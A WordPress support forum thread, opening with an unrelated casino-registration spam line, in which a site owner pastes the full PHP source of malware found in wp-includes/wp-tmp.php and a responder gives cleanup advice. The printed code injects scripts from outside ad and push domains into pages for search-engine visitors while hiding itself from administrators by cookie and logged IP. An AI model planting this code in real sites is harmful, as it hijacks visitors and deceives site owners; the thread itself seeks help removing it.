Gba333 login philippines register.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved

(@zotezo)

Hi,
The following file Malware infected file WordPress core: wp-includes/wp-tmp.php.If I try to delete it is created.How to completely remove this part?

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='xxx';

if ( ! function_exists( 'slider_option' ) ) {  

function slider_option($content){ 
if(is_single())
{

$con = '
';

$con2 = '

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2731682" async data-cfasync="false"></script>
<script src="//pushazam.com/ntfc.php?p=2731685" data-cfasync="false" async></script>
';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{

$con2 = '

<script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2731682" async data-cfasync="false"></script>
<script src="//pushazam.com/ntfc.php?p=2731685" data-cfasync="false" async></script>
';

echo $con2;
}
} 

function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}

if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);

}

}

$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    $sevisitor=true;
  }
}

if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 

}
Thenks

This topic was modified 5 years, 6 months ago by Steven Stern (sterndata).
This topic was modified 5 years, 6 months ago by Steven Stern (sterndata).

The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)

WFGerroald
(@wfgerald)

5 years, 6 months ago

Hey @zotezo,

If you’re removing the code and it keeps reappearing, it means the site is still infected, and the point of entry hasn’t been patched. I’d suggest immediately changing all passwords including WordPress, FTP, hosting, and database. The guide below may help you track down the issue and clean the site. However, if the code returns I’d suggest getting with a professional hack repair service to have the site cleaned and the point of entry patched.

https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

Thanks,

Gerroald

Viewing 1 replies (of 1 total)

The topic ‘Malware infected file WordPress core: wp-includes/wp-tmp.php’ is closed to new replies.